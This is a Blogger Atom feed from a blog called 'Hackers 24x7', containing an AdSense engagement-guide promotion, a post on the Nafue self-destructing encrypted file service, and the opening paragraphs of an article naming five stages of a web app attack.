<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-3275619147523422902</id><updated>2024-11-05T18:54:09.170-08:00</updated><category term="Encryption"/><category term="Hackers"/><title type='text'>Hackers 24x7</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://hackers24x7.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default'/><link rel='alternate' type='text/html' href='http://hackers24x7.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>11</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-3275619147523422902.post-6429843553591336798</id><published>2016-05-11T06:56:00.001-07:00</published><updated>2016-05-11T06:56:09.243-07:00</updated><title type='text'>The latest from Blogger Buzz</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;DY0BBXD-N-c&quot; style=&quot;border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; color: #222222; font-family: Arial, sans-serif; font-size: 13px; line-height: 18px; margin: 0px; padding: 16px 0px;&quot;&gt;
&lt;h3 style=&quot;font-family: &#39;Open Sans&#39;, arial, sans-serif; font-size: 18px; font-weight: 400; margin: 0px; padding: 0px;&quot;&gt;
The latest from&amp;nbsp;&lt;a href=&quot;http://blogger.googleblog.com/&quot; style=&quot;color: #1155cc; margin: 0px; padding: 0px; text-decoration: none;&quot; target=&quot;buzz&quot;&gt;Blogger Buzz&lt;/a&gt;&lt;/h3&gt;
&lt;/div&gt;
&lt;div class=&quot;DY0BBXD-N-e&quot; style=&quot;border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: #222222; font-family: Arial, sans-serif; font-size: 13px; line-height: 18px; margin: 0px; padding: 16px 0px; word-wrap: break-word;&quot;&gt;
&lt;h4 style=&quot;font-family: &#39;Open Sans&#39;, arial, sans-serif; font-size: 18px; font-weight: 400; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://blogger.googleblog.com/2016/05/keep-your-readers-interested-with.html&quot; style=&quot;color: black !important; margin: 0px; padding: 0px; text-decoration: none;&quot; target=&quot;post&quot;&gt;Keep your readers interested with the AdSense Guide to Audience Engagement&lt;/a&gt;&lt;/h4&gt;
&lt;div class=&quot;DY0BBXD-N-d&quot; style=&quot;color: #666666; margin: 16px 0px; padding: 0px;&quot;&gt;
&lt;span style=&quot;color: #222222; font-family: arial; font-size: 14.6667px; margin: 0px; padding: 0px; white-space: pre-wrap;&quot;&gt;Today, information is at our fingertips and we can access it from anywhere on any device. Just a few taps pull up millions of websites all competing for our attention. For bloggers, engaging with your audience has never been more important or more challenging. To help lay the foundation to a winning engagement strategy, the AdSense team created the &lt;/span&gt;&lt;a href=&quot;https://services.google.com/fb/forms/adsenseengagementguide/?utm_source=Referral-Blogger&amp;amp;utm_medium=social-blogger&amp;amp;utm_campaign=IM-Adsense-Audience-Engagement&quot; style=&quot;color: #1155cc; font-family: Arial; font-size: 14.6667px; margin: 0px; padding: 0px; text-decoration: none; white-space: pre-wrap;&quot;&gt;AdSense Guide to Audience Engagement.&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;margin: 0px; padding: 0px;&quot;&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;margin: 0px; padding: 0px;&quot; trbidi=&quot;on&quot;&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: none; margin: 0px; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;margin: 0px; padding: 0px; text-align: center;&quot;&gt;
&lt;a href=&quot;http://3.bp.blogspot.com/-M9H1WFpJ9PI/Vyzag7VJBeI/AAAAAAAAGU8/V-ABYkKeg4oz-jzFAhGIqPWhl4vy1OLuACK4B/s1600/shutterstock_263267918.jpg&quot; imageanchor=&quot;1&quot; style=&quot;color: #1155cc; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;424&quot; src=&quot;https://3.bp.blogspot.com/-M9H1WFpJ9PI/Vyzag7VJBeI/AAAAAAAAGU8/V-ABYkKeg4oz-jzFAhGIqPWhl4vy1OLuACK4B/s640/shutterstock_263267918.jpg&quot; style=&quot;margin: 0px; padding: 0px;&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: arial; font-size: 14.6667px; margin: 0px; padding: 0px; vertical-align: baseline; white-space: pre-wrap;&quot;&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/span&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;line-height: 1.38; margin: 0pt 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;https://www.thinkwithgoogle.com/research-studies/micromoments-guide-pdf-download.html&quot; style=&quot;color: #1155cc; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: 14.6667px; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;&quot;&gt;Research shows&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: black; font-family: arial; font-size: 14.6667px; margin: 0px; padding: 0px; vertical-align: baseline; white-space: pre-wrap;&quot;&gt; that &lt;/span&gt;&lt;span style=&quot;color: black; font-family: arial; font-size: 14.6667px; font-weight: 700; margin: 0px; padding: 0px; vertical-align: baseline; white-space: pre-wrap;&quot;&gt;29% of smartphone users will immediately switch to another site or app if it doesn’t satisfy their needs. &lt;/span&gt;&lt;/div&gt;
&lt;span id=&quot;docs-internal-guid-fdc877d6-8327-ddbd-1290-7c063fc14439&quot; style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/span&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;line-height: 1.38; margin: 0pt 0px; padding: 0px;&quot;&gt;
&lt;span style=&quot;color: black; font-family: arial; font-size: 14.6667px; margin: 0px; padding: 0px; vertical-align: baseline; white-space: pre-wrap;&quot;&gt;To help keep your audience engaged, get your free copy of the &lt;/span&gt;&lt;a href=&quot;https://services.google.com/fb/forms/adsenseengagementguide/?utm_source=Referral-Blogger&amp;amp;utm_medium=social-blogger&amp;amp;utm_campaign=IM-Adsense-Audience-Engagement&quot; style=&quot;color: #1155cc; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: 14.6667px; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;&quot;&gt;AdSense Guide to Audience Engagement&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: black; font-family: arial; font-size: 14.6667px; margin: 0px; padding: 0px; vertical-align: baseline; white-space: pre-wrap;&quot;&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;line-height: 1.38; margin: 0pt 0px; padding: 0px;&quot;&gt;
&lt;span style=&quot;color: black; font-family: arial; font-size: 14.6667px; margin: 0px; padding: 0px; vertical-align: baseline; white-space: pre-wrap;&quot;&gt; &lt;/span&gt;&lt;/div&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;line-height: 1.38; margin: 0pt 0px; padding: 0px;&quot;&gt;
&lt;span style=&quot;color: black; font-family: arial; font-size: 14.6667px; margin: 0px; padding: 0px; vertical-align: baseline; white-space: pre-wrap;&quot;&gt;In the guide, you’ll learn:&lt;/span&gt;&lt;/div&gt;
&lt;ul style=&quot;list-style-type: none; margin: 0pt 0px; padding: 0px;&quot;&gt;
&lt;li dir=&quot;ltr&quot; style=&quot;color: black; font-family: Arial; font-size: 14.6667px; list-style-type: disc; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;line-height: 1.38; margin: 0pt 0px; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-family: arial; font-size: 14.6667px; margin: 0px; padding: 0px; vertical-align: baseline; white-space: pre-wrap;&quot;&gt;How to help your audience become familiar with your brand&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li dir=&quot;ltr&quot; style=&quot;color: black; font-family: Arial; font-size: 14.6667px; list-style-type: disc; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;line-height: 1.38; margin: 0pt 0px; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-family: arial; font-size: 14.6667px; margin: 0px; padding: 0px; vertical-align: baseline; white-space: pre-wrap;&quot;&gt;Best practices to design user journeys&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li dir=&quot;ltr&quot; style=&quot;color: black; font-family: Arial; font-size: 14.6667px; list-style-type: disc; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;line-height: 1.38; margin: 0pt 0px; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-family: arial; font-size: 14.6667px; margin: 0px; padding: 0px; vertical-align: baseline; white-space: pre-wrap;&quot;&gt;How to develop content that resonates with your audience&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li dir=&quot;ltr&quot; style=&quot;color: black; font-family: Arial; font-size: 14.6667px; list-style-type: disc; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;line-height: 1.38; margin: 0pt 0px; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-family: arial; font-size: 14.6667px; margin: 0px; padding: 0px; vertical-align: baseline; white-space: pre-wrap;&quot;&gt;Ways to make your content easy to consume&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li dir=&quot;ltr&quot; style=&quot;color: black; font-family: Arial; font-size: 14.6667px; list-style-type: disc; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;line-height: 1.38; margin: 0pt 0px; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-family: arial; font-size: 14.6667px; margin: 0px; padding: 0px; vertical-align: baseline; white-space: pre-wrap;&quot;&gt;Why you should share the love with other sites by referring to good sources&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackers24x7.blogspot.com/feeds/6429843553591336798/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackers24x7.blogspot.com/2016/05/the-latest-from-blogger-buzz.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/6429843553591336798'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/6429843553591336798'/><link rel='alternate' type='text/html' href='http://hackers24x7.blogspot.com/2016/05/the-latest-from-blogger-buzz.html' title='The latest from Blogger Buzz'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://3.bp.blogspot.com/-M9H1WFpJ9PI/Vyzag7VJBeI/AAAAAAAAGU8/V-ABYkKeg4oz-jzFAhGIqPWhl4vy1OLuACK4B/s72-c/shutterstock_263267918.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3275619147523422902.post-6570000759875464461</id><published>2016-02-04T19:19:00.003-08:00</published><updated>2016-02-04T19:20:23.745-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Encryption"/><title type='text'>You can use this website to share self destructing encrypted file</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h1 class=&quot;entry-title&quot; style=&quot;background-color: white; border-left-color: rgb(72, 123, 228); border-left-style: solid; border-width: 0px 0px 0px 3px; color: #19232d; font-family: Roboto, Arial, sans-serif; font-size: 18px; font-stretch: normal; font-weight: normal; line-height: 1.5; margin: 0px 0px 24px; padding: 0px 0px 0px 14px; text-transform: uppercase; vertical-align: baseline;&quot;&gt;
ENCRYPTED FILES SHARED VIA THIS WEBSITE WILL SELF DESTRUCT IN 24 HOURS&lt;/h1&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgazRl3DW2JSU60J3OJ5oi7FncozH50VNh4rXeJSNB5YpfHGZB6LqTT4ulFSZpbWF-wYFimEFsdOoZ3U0Iv2Zn_lEFPN0MxXHCRFr15Wb_oL1UgbWm_lJVj1onLpswyJujAZQjl2UWfqOQ/s1600/Vlcsnap-2013-08-04-00h32m23s225-702x336.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;305&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgazRl3DW2JSU60J3OJ5oi7FncozH50VNh4rXeJSNB5YpfHGZB6LqTT4ulFSZpbWF-wYFimEFsdOoZ3U0Iv2Zn_lEFPN0MxXHCRFr15Wb_oL1UgbWm_lJVj1onLpswyJujAZQjl2UWfqOQ/s640/Vlcsnap-2013-08-04-00h32m23s225-702x336.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin-bottom: 1.857em; padding: 0px; vertical-align: baseline;&quot;&gt;
If you are looking send a very personal or important file which you want destroyed after the receiver sees/reads it, you can now avail the services of a website called Nafue.&amp;nbsp;[menkveldj]who is a developer, has built a&amp;nbsp;&lt;a href=&quot;http://nafue.com/&quot; style=&quot;border: 0px; color: #487be4; font-family: inherit; margin: 0px; padding: 0px; text-decoration: none; transition: all 0.4s ease-in-out; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;service that encrypts files which self destruct in 24 hours&lt;/a&gt;.&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin-bottom: 1.857em; padding: 0px; vertical-align: baseline;&quot;&gt;
However there some many prerequisites for using a the website. The download link can only be used once.&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin-bottom: 1.857em; padding: 0px; vertical-align: baseline;&quot;&gt;
Nafue works like this. You want to share a very imported file, you have to encrypt it on your side using a a password generated using&amp;nbsp;&lt;a href=&quot;https://en.wikipedia.org/wiki/PBKDF2&quot; style=&quot;border: 0px; color: #487be4; font-family: inherit; margin: 0px; padding: 0px; text-decoration: none; transition: all 0.4s ease-in-out; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;Pbkdf2 key&lt;/a&gt;&amp;nbsp;before uploading it to the&amp;nbsp;&lt;a href=&quot;https://aws.amazon.com/s3/&quot; style=&quot;border: 0px; color: #487be4; font-family: inherit; margin: 0px; padding: 0px; text-decoration: none; transition: all 0.4s ease-in-out; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;s3 storage service&lt;/a&gt;. Once this is done, the website will provide you with a one-time-use link to share with the recipient. After the first download, or 24 hours, the link and the encrypted file are both deleted.&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin-bottom: 1.857em; padding: 0px; vertical-align: baseline;&quot;&gt;
Remember, the receiver must enter the same password to decrypt and recover the file. No one but the sharer and receiver know what the actual file is.&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin-bottom: 1.857em; padding: 0px; vertical-align: baseline;&quot;&gt;
If the file were to land in some wrong person’s hand, they would take some years before cracking the 256AES encryption.&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin-bottom: 1.857em; padding: 0px; vertical-align: baseline;&quot;&gt;
It’s still work in progress, so chime in with your comments and suggestions. To dig into the code, check out his&amp;nbsp;&lt;a href=&quot;https://github.com/menkveldj/nafue&quot; style=&quot;border: 0px; color: #487be4; font-family: inherit; margin: 0px; padding: 0px; text-decoration: none; transition: all 0.4s ease-in-out; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;repository on Github&lt;/a&gt;, which also has instructions to build and run it if you’d like to do your own version.&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #0e0b0b; float: none; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline; width: 702px;&quot;&gt;
&lt;div style=&quot;border: 0px; float: left; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline; width: 351px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;pcAds&quot; id=&quot;widMostsa&quot; style=&quot;border: 0px; display: inline-block; float: left; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline; width: 351px;&quot;&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; clear: both; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 0px; height: 0px; line-height: 0px; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;ssba ssba-wrap&quot; style=&quot;background: none rgb(255, 255, 255); border: 0px; color: #0e0b0b; font-family: &#39;Indie Flower&#39;; font-size: 20px; font-weight: bold; margin-bottom: 1.857em; margin-left: 60px !important; margin-right: 0px; margin-top: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackers24x7.blogspot.com/feeds/6570000759875464461/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackers24x7.blogspot.com/2016/02/you-can-use-this-website-to-share-self.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/6570000759875464461'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/6570000759875464461'/><link rel='alternate' type='text/html' href='http://hackers24x7.blogspot.com/2016/02/you-can-use-this-website-to-share-self.html' title='You can use this website to share self destructing encrypted file'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgazRl3DW2JSU60J3OJ5oi7FncozH50VNh4rXeJSNB5YpfHGZB6LqTT4ulFSZpbWF-wYFimEFsdOoZ3U0Iv2Zn_lEFPN0MxXHCRFr15Wb_oL1UgbWm_lJVj1onLpswyJujAZQjl2UWfqOQ/s72-c/Vlcsnap-2013-08-04-00h32m23s225-702x336.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3275619147523422902.post-2738997572270824326</id><published>2016-01-18T08:37:00.001-08:00</published><updated>2016-01-18T08:37:05.673-08:00</updated><title type='text'>What Is A Web App Attack, How Does It Work — 5 Stages Of A Web App Attack</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVa5JzSdd0jusFLOsPDboZ6fjbCchWRQJx_h-dKphdnFka7pilBF9k2rZY5a5MtXoxpsZUJg1EQjWI1w51m3OqWlCCjU_GbS7tdDrn0AQlJ4JeEL5FEZKDgNZhALNuzKqyU-KFlo2TIzI/s1600/web-app-attack-5-stages.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;332&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVa5JzSdd0jusFLOsPDboZ6fjbCchWRQJx_h-dKphdnFka7pilBF9k2rZY5a5MtXoxpsZUJg1EQjWI1w51m3OqWlCCjU_GbS7tdDrn0AQlJ4JeEL5FEZKDgNZhALNuzKqyU-KFlo2TIzI/s640/web-app-attack-5-stages.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;em style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 600; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Short Bytes:&lt;/span&gt;&amp;nbsp;A Web App Attack is one of the biggest threats faced by websites and online businesses. In this article, we are going to tell you about 5 stages of a Web App Attack —&amp;nbsp;Reconnaissance, Scanning, Gaining Access, Maintaining Access, and Covering Tracks — and how this attack works.&lt;/em&gt;&lt;/div&gt;
&lt;div class=&quot;p1&quot; style=&quot;background-color: white; border: 0px; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;su-row&quot; style=&quot;background-color: white; border: 0px; clear: both; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin: 0px 0px 1.5em; padding: 0px; vertical-align: baseline; zoom: 1;&quot;&gt;
&lt;div class=&quot;su-column su-column-size-1-5&quot; style=&quot;border: 0px; box-sizing: border-box; float: left; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline; width: 134.391px;&quot;&gt;
&lt;div class=&quot;su-column-inner su-clearfix&quot; style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;su-column su-column-size-4-5&quot; style=&quot;border: 0px; box-sizing: border-box; float: right; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 0px 0px 32px; padding: 0px; vertical-align: baseline; width: 633.594px;&quot;&gt;
&lt;div class=&quot;su-column-inner su-clearfix&quot; style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span class=&quot;su-dropcap su-dropcap-style-flat&quot; style=&quot;background: rgb(68, 68, 68); border: 0px; color: white; display: inline-block; float: left; font-family: inherit; font-size: 1.5em; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 2em; line-height: 2em; margin: 0px 0.5em 0.2em 0px; overflow: hidden; padding: 0px; text-align: center; text-transform: uppercase; vertical-align: baseline; width: 2em;&quot;&gt;I&lt;/span&gt;f we start looking at the number of hacking attacks in 2015 alone, the number of personal records breached touches almost one billion. In 2015, we saw some of the most notorious hacking attacks till date, namely attacks on&amp;nbsp;&lt;a href=&quot;http://fossbytes.com/truth-of-ashley-madison-20-million-guys-were-trying-to-hook-up-with-1500-women/&quot; style=&quot;border: 0px; color: #3366ff; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition-duration: 0.2s; transition-timing-function: ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;Ashleey Madison&lt;/a&gt;,&amp;nbsp;&lt;a href=&quot;http://fossbytes.com/15-year-old-boy-arrested-over-the-talktalk-hacking-attack/&quot; style=&quot;border: 0px; color: #3366ff; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition-duration: 0.2s; transition-timing-function: ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;TalkTalk&lt;/a&gt;,&amp;nbsp;&lt;a href=&quot;http://fossbytes.com/hackers-release-gigabytes-of-user-data-of-data-from-patreon-donation-site/&quot; style=&quot;border: 0px; color: #3366ff; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition-duration: 0.2s; transition-timing-function: ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;Patreon Donation Site&lt;/a&gt;,&amp;nbsp;&lt;a href=&quot;http://fossbytes.com/russian-hackers-attack-pentagon-computers-used-new-and-unseen-methods/&quot; style=&quot;border: 0px; color: #3366ff; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition-duration: 0.2s; transition-timing-function: ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;Pentagon&lt;/a&gt;etc.&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
As the application development is moving more and more onto the web, the Web is home to everything we need. 2015 also saw an increase in Web App Attacks that are carried out using a well-planned plan-of-action. The attack usually&amp;nbsp;targets the web server used by the target company. In spite of network defenses like intrusion penetration systems and firewalls, the Web application could be attacked by an outsider in multiple ways.&lt;/div&gt;
&lt;div class=&quot;code-block code-block-9 ai-desktop&quot; style=&quot;border: 0px; display: inherit !important; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 8px auto; padding: 0px; text-align: center; vertical-align: baseline;&quot;&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2 style=&quot;border: 0px; color: #444444; font-family: inherit; font-size: 34px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 400; letter-spacing: -0.7px; line-height: 1.3em; margin: 0px 0px 14px; padding: 0px; vertical-align: baseline; word-wrap: break-word;&quot;&gt;
What Is A Web App Attack, How Does It Work&lt;/h2&gt;
